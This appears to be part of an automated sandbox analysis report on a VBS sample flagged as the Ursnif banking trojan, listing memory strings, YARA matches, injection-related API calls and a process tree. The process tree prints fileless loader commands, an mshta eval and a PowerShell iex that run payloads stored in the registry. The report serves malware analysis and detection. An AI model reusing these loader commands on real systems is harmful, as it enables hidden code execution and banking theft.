            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,36_2_04CF6F64
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE33F8 NtQueryInformationProcess,36_2_04CE33F8
            Source: C:\Windows\explorer.exeCode function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory,36_2_04D21003
            Source: C:\Windows\System32\control.exeCode function: 37_2_005568E0 NtReadVirtualMemory,37_2_005568E0
            Source: C:\Windows\System32\control.exeCode function: 37_2_005670B8 NtMapViewOfSection,37_2_005670B8
            Source: C:\Windows\System32\control.exeCode function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,37_2_00561154
            Source: C:\Windows\System32\control.exeCode function: 37_2_005729D0 NtAllocateVirtualMemory,37_2_005729D0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,37_2_0055C188
            Source: C:\Windows\System32\control.exeCode function: 37_2_00569B08 NtCreateSection,37_2_00569B08
            Source: C:\Windows\System32\control.exeCode function: 37_2_005533F8 NtQueryInformationProcess,37_2_005533F8
            Source: C:\Windows\System32\control.exeCode function: 37_2_00552CC0 NtQueryInformationProcess,37_2_00552CC0
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557F44 NtWriteVirtualMemory,37_2_00557F44
            Source: C:\Windows\System32\control.exeCode function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,37_2_00566F64
            Source: C:\Windows\System32\control.exeCode function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_00591003
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFAE8036_2_04CFAE80
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF2F9036_2_04CF2F90
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE7CCC36_2_04CE7CCC
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE34A036_2_04CE34A0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEBC1C36_2_04CEBC1C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF743436_2_04CF7434
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE3D8136_2_04CE3D81
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFEDA036_2_04CFEDA0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEB55C36_2_04CEB55C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0FD7C36_2_04D0FD7C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF7D6036_2_04CF7D60
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE457836_2_04CE4578
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0AD2836_2_04D0AD28
            Source: C:\Windows\explorer.exeCode function: 36_2_04D02E0436_2_04D02E04
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE562836_2_04CE5628
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE8FC836_2_04CE8FC8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF9FD036_2_04CF9FD0
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0DFF836_2_04D0DFF8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF07AC36_2_04CF07AC
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEAF4436_2_04CEAF44
            Source: C:\Windows\explorer.exeCode function: 36_2_04D01F7436_2_04D01F74
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE9F7C36_2_04CE9F7C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE473436_2_04CE4734
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0D72C36_2_04D0D72C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0B0F836_2_04D0B0F8
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0F8E836_2_04D0F8E8
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0884436_2_04D08844
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE207C36_2_04CE207C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE882436_2_04CE8824
            Source: C:\Windows\explorer.exeCode function: 36_2_04D059F836_2_04D059F8
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEC18836_2_04CEC188
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE390836_2_04CE3908
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0610C36_2_04D0610C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CEA2EC36_2_04CEA2EC
            Source: C:\Windows\explorer.exeCode function: 36_2_04D082E036_2_04D082E0
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF6A7436_2_04CF6A74
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0D26C36_2_04D0D26C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFCA0436_2_04CFCA04
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF021C36_2_04CF021C
            Source: C:\Windows\explorer.exeCode function: 36_2_04CF0BB036_2_04CF0BB0
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0035436_2_04D00354
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFE35C36_2_04CFE35C
            Source: C:\Windows\explorer.exeCode function: 36_2_04D0934436_2_04D09344
            Source: C:\Windows\explorer.exeCode function: 36_2_04CE7B1436_2_04CE7B14
            Source: C:\Windows\explorer.exeCode function: 36_2_04CFC32436_2_04CFC324
            Source: C:\Windows\explorer.exeCode function: 36_2_04D2157036_2_04D21570
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055C18837_2_0055C188
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056AE8037_2_0056AE80
            Source: C:\Windows\System32\control.exeCode function: 37_2_00562F9037_2_00562F90
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057884437_2_00578844
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055207C37_2_0055207C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055882437_2_00558824
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057B0F837_2_0057B0F8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057F8E837_2_0057F8E8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057610C37_2_0057610C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055390837_2_00553908
            Source: C:\Windows\System32\control.exeCode function: 37_2_005759F837_2_005759F8
            Source: C:\Windows\System32\control.exeCode function: 37_2_00566A7437_2_00566A74
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057D26C37_2_0057D26C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056021C37_2_0056021C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056CA0437_2_0056CA04
            Source: C:\Windows\System32\control.exeCode function: 37_2_005782E037_2_005782E0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055A2EC37_2_0055A2EC
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057035437_2_00570354
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056E35C37_2_0056E35C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057934437_2_00579344
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557B1437_2_00557B14
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056C32437_2_0056C324
            Source: C:\Windows\System32\control.exeCode function: 37_2_00560BB037_2_00560BB0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055BC1C37_2_0055BC1C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056743437_2_00567434
            Source: C:\Windows\System32\control.exeCode function: 37_2_00557CCC37_2_00557CCC
            Source: C:\Windows\System32\control.exeCode function: 37_2_005534A037_2_005534A0
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055B55C37_2_0055B55C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057FD7C37_2_0057FD7C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055457837_2_00554578
            Source: C:\Windows\System32\control.exeCode function: 37_2_00567D6037_2_00567D60
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057AD2837_2_0057AD28
            Source: C:\Windows\System32\control.exeCode function: 37_2_00553D8137_2_00553D81
            Source: C:\Windows\System32\control.exeCode function: 37_2_0056EDA037_2_0056EDA0
            Source: C:\Windows\System32\control.exeCode function: 37_2_00572E0437_2_00572E04
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055562837_2_00555628
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055AF4437_2_0055AF44
            Source: C:\Windows\System32\control.exeCode function: 37_2_00571F7437_2_00571F74
            Source: C:\Windows\System32\control.exeCode function: 37_2_00559F7C37_2_00559F7C
            Source: C:\Windows\System32\control.exeCode function: 37_2_0055473437_2_00554734
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057D72C37_2_0057D72C
            Source: C:\Windows\System32\control.exeCode function: 37_2_00569FD037_2_00569FD0
            Source: C:\Windows\System32\control.exeCode function: 37_2_00558FC837_2_00558FC8
            Source: C:\Windows\System32\control.exeCode function: 37_2_0057DFF837_2_0057DFF8
            Source: C:\Windows\System32\control.exeCode function: 37_2_005607AC37_2_005607AC
            Source: my_presentation_96642.vbsInitial sample: Strings found which are bigger than 50
            Source: a11zr31h.dll.32.drStatic PE information: No import functions for PE file found
            Source: x0s3qhtp.dll.34.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winVBS@24/51@4/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.datJump to behavior
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: my_presentation_96642.vbsVirustotal: Detection: 14%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2Jump to behavior
